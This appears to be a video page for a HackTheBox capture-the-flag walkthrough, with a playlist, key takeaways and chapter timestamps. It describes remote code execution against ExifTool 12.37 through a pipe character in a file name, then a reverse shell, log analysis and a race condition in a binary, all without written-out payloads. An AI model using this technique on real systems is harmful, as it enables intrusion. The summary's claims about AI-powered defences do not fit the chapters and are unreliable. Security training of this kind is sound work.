46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches viewers how to conduct a cybersecurity investigation using various tools and techniques. It covers topics such as reconnaissance, web application security, and file upload vulnerabilities, and demonstrates how to exploit vulnerabilities and gain access to a system. The video also discusses the use of AI-powered tools for cybersecurity and how to implement defensive measures against AI-powered attacks.

Key Takeaways
  1. Map the network using nmap
  2. Enumerate versions and set up a default script with nmap
  3. Run nmap on the target IP address
  4. Set up a gobuster dir with a word list
  5. Intercept and analyze file uploads using Burp Suite
  6. Create a Perl script to read a file and execute a shell command using the `open` function
  7. Exploit a vulnerability in ExifTool version 12.37 using a crafted file name with a pipe character
  8. Use Lin peas to analyze the box and find a reverse shell in the call tree
  9. Use Chainsaw to rapidly search through logs and detect potential security threats
  10. Analyze event IDs and run Sigma rules to detect process creation and other suspicious activity
💡 The video demonstrates how to use various tools and techniques to conduct a cybersecurity investigation and exploit vulnerabilities in a system. It also highlights the importance of using AI-powered tools for cybersecurity and implementing defensive measures against AI-powered attacks.

Related Reads

📰
Social Discovery Group’s Announcement: A Communication That Raises Questions About Transparency and…
Social Discovery Group's announcement raises questions about transparency and cybersecurity, highlighting the importance of critical analysis in the industry
Medium · Cybersecurity
📰
Adobe Producer Spoofing: A PDF Metadata Forgery Case Study
Learn how to detect PDF metadata forgery by analyzing the Adobe Producer string and structural forensics to catch contradictions
Dev.to · Iurii Rogulia
📰
Today's the Deadline: Three Separate CISA Patch Orders Just Collided on the Same Weekend
Apply urgent CISA patches before the deadline to ensure infrastructure security
Dev.to · Fabio Baensch
📰
How Anthropic Could Have Prevented the “Claude Gift Fraud” With Security 101
Learn how Anthropic's security failures led to the Claude gift fraud and how basic security measures could have prevented it
Medium · Cybersecurity

Chapters (21)

Introduction
1:00 Start of nmap
2:00 Start of gobuster
4:00 Discovering an upload form, looking for where things get uploaded
5:50 The upload gives us ExifTool output, including the version number to show it i
8:11 You should really watch "The Perl Jam"
8:40 Showing the weird syntax of perl's file open and how | leads to RCE
16:15 Back to the box, exploiting and getitng a shell
20:00 Reverse shell returned, looking at the uploaded files
22:35 Running LinPEAS to discover a cron
27:00 There's an outlook email message with an attachment. Copying it then convertin
32:45 The file was an windows event log. Using Chainsaw to search through the logs
38:30 Using Chainsaw and JQ to parse the Successful and Failed logins
42:25 In the failed logins field, there's a password as a username and logging in as
44:35 There's a binary on this box, copying it to us and opening in Ghidra
45:30 Start of reversing, just showing strings and finding out where the get loaded
47:00 Running the binary in GDB and showing how arguments work, then renaming and re
51:30 Retyping done, renaming a few variables to make things easier to read
53:45 Cleaning up the curl_easy_setopt, code by creating an enum in C then using Ghi
59:20 Now that the code is cleaned up, it is obvious the program executes perl scrip
1:01:05 Showing there is also a race condition in the binary because the curl download
Up next
Best VPN for Mac 2026 — Top 3 Tested and Which ONE Wins
Tutorial Stack
Watch →